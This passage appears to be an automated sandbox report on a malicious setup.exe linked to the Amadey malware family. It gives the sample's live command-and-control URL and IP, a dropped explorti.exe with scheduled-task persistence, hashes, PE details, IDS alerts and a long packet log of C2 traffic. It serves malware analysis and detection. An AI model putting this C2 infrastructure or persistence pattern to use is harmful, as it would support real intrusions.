                    http://185.215.113.19/Vi9leo/index.phpoftexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phprosoftexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.19
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483206
                    Start date and time:2024-07-26 20:55:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 57s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:setup.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 7632 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 7744 because there are no executed function
                    • Execution Graph export aborted for target setup.exe, PID 7448 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: setup.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:57:01API Interceptor1186x Sleep call for process: explorti.exe modified
                    19:55:58Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.19file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    LbMTyCFRzs.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    DHBIT8FeuO.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.9
                    file.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.9
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16
                    SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    EXyAlLKIck.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                    • 185.215.113.16
                    LbMTyCFRzs.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exefile.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

                      Download File
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1909760
                      Entropy (8bit):7.949641205972528
                      Encrypted:false
                      SSDEEP:49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
                      MD5:2AF5EB9FB318C9A454DE54914E121031
                      SHA1:FCBAEA817B8EB0D63BA7B31804BE2353D564BA93
                      SHA-256:589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
                      SHA-512:5873029940644909567F97A6D4C78D78064E7FFF22CC5B90FDA5F8C31017B30CA7DD2FC7672F7AB7460EE49D6154ED23EF5A52EA0077D09347B0B9CA3E9839F4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Joe Sandbox View:
                      • Filename: file.exe, Detection: malicious, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................K...........@.......................... L......:....@.................................W...k...........................4.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...usoriijt......1.....................@...ymfuwjgb......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Windows\Tasks\explorti.job

                      Download File
                      Process:C:\Users\user\Desktop\setup.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288
                      Entropy (8bit):3.4138816366542772
                      Encrypted:false
                      SSDEEP:6:J0rRHsX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1XRt0:J0rRH24RKQ1cag7jzvYRQV1ht0
                      MD5:B90B6DC3B47674C67FA4553DA660D55F
                      SHA1:B5302B2A25B5D562B1316775C3E3BC19AF473B6B
                      SHA-256:A2A65D2E3FB7222032AA62D400C5FB587D9FBC4F46D6107BA217EBFEEA52A4BA
                      SHA-512:C100D6AD63FC4DAD88728DA0F74586EE55BBDCC3D851764B3576F16EF9A55B2AF6E3B188B882347DA0EB0B6FCECDC8894BE87C254B116B163CA23CCC74207BAB
                      Malicious:false
                      Reputation:low
                      Preview:.....L..tkmM..m...!.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................8.@3P.........................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.949641205972528
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:setup.exe
                      File size:1'909'760 bytes
                      MD5:2af5eb9fb318c9a454de54914e121031
                      SHA1:fcbaea817b8eb0d63ba7b31804be2353d564ba93
                      SHA256:589eb31a43d44fe275c70bfc3f592965b9236b59645a7ed633bbec66526d64ab
                      SHA512:5873029940644909567f97a6d4c78d78064e7fff22cc5b90fda5f8c31017b30ca7dd2fc7672f7ab7460ee49d6154ed23ef5a52ea0077d09347b0b9ca3e9839f4
                      SSDEEP:49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
                      TLSH:6B95333F4C9431E4E75D4E3AD05E3BA1D9B88250A238BFE82FD587C4B591B42BCA1479
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x8bf000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FC168824D1Ah
                      lar ebx, word ptr [00000000h]
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [ebx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add eax, 0000000Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add eax, 0000000Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], cl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add eax, 0000000Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4bda340x10usoriijt
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4bd9e40x18usoriijt
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x680000x2dc00d6f6bd714358d4e2cc86535d6ac7d2ddFalse0.9998612534153005data7.983026486073879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x690000x1e00x2005d7aaf6d88e2a9fb2a22f714c54fa253False0.576171875data4.458845368976753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x6b0000x2b20000x2006d2cc301701120faa294ac0b039ad4b2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      usoriijt0x31d0000x1a10000x1a0c002cea1fca24cb49c6e19d3a0b2ac70c77False0.9945536283368326data7.952894618410208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      ymfuwjgb0x4be0000x10000x4002a7767b6ef35e4c8a1785e1cad05540dFalse0.728515625data5.75808497991159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4bf0000x30000x2200f9a796e180877a9fe33f6235b9fc288eFalse0.07019761029411764DOS executable (COM)0.8015233745232316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x4bda440x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-26T20:57:23.145810+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34975380192.168.2.4185.215.113.19
                      2024-07-26T20:57:04.743588+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973880192.168.2.4185.215.113.19
                      2024-07-26T20:57:09.328882+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34974280192.168.2.4185.215.113.19
                      2024-07-26T20:57:25.383489+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34975580192.168.2.4185.215.113.19
                      2024-07-26T20:57:03.607737+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973780192.168.2.4185.215.113.19
                      2024-07-26T20:56:56.382955+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973613.85.23.86192.168.2.4
                      2024-07-26T20:56:18.228909+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973020.12.23.50192.168.2.4

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 26, 2024 20:57:02.810442924 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:02.815584898 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:02.820894957 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:02.821043968 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:02.826141119 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.606364965 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.607737064 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.608504057 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.613394022 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.861641884 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.864552975 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.978813887 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.979131937 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.983961105 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.984837055 CEST8049737185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:03.984905958 CEST4973780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.985050917 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.985050917 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:03.990096092 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:04.743524075 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:04.743587971 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:04.744437933 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:04.751236916 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:04.996643066 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:04.996834993 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.103846073 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.104027987 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.117288113 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:05.117469072 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.117528915 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.120222092 CEST8049738185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:05.120281935 CEST4973880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.133615017 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:05.905831099 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:05.906579018 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.907996893 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:05.912947893 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:06.160979986 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:06.161119938 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.275803089 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.276077032 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.280905962 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:06.280977011 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.281044960 CEST8049739185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:06.281061888 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.281099081 CEST4973980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:06.285959005 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.061556101 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.061717033 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.062403917 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.067182064 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.310533047 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.310671091 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.432512045 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.432862043 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.437796116 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.437861919 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.437958956 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.438036919 CEST8049740185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:07.440500975 CEST4974080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:07.442810059 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.195735931 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.195940971 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.197449923 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.202512980 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.447170973 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.447268963 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.557117939 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.557482004 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.562800884 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.562894106 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.562901974 CEST8049741185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:08.562964916 CEST4974180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.563178062 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:08.568422079 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.325263977 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.328881979 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.329444885 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.334223986 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.574621916 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.575373888 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.681888103 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.682463884 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.687489986 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.687553883 CEST8049742185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:09.687558889 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.687612057 CEST4974280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.687731028 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:09.692718029 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:10.820327044 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:10.820384979 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:10.821593046 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:10.821639061 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:10.821752071 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:10.827935934 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.073326111 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.073390007 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.181922913 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.182229042 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187131882 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.187208891 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187298059 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.187500954 CEST8049743185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.187551022 CEST4974380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.192141056 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.996247053 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:11.996329069 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:11.998744011 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.004219055 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.244764090 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.244875908 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.354029894 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.354331017 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359203100 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.359291077 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359446049 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.359631062 CEST8049744185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:12.359697104 CEST4974480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:12.364500046 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.129484892 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.129726887 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.130716085 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.136101961 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.382339001 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.382574081 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.498162031 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.498476028 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.504960060 CEST8049746185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.505081892 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.505218983 CEST4974680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.507261038 CEST8049745185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:13.507338047 CEST4974580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:13.511342049 CEST8049746185.215.113.19192.168.2.4
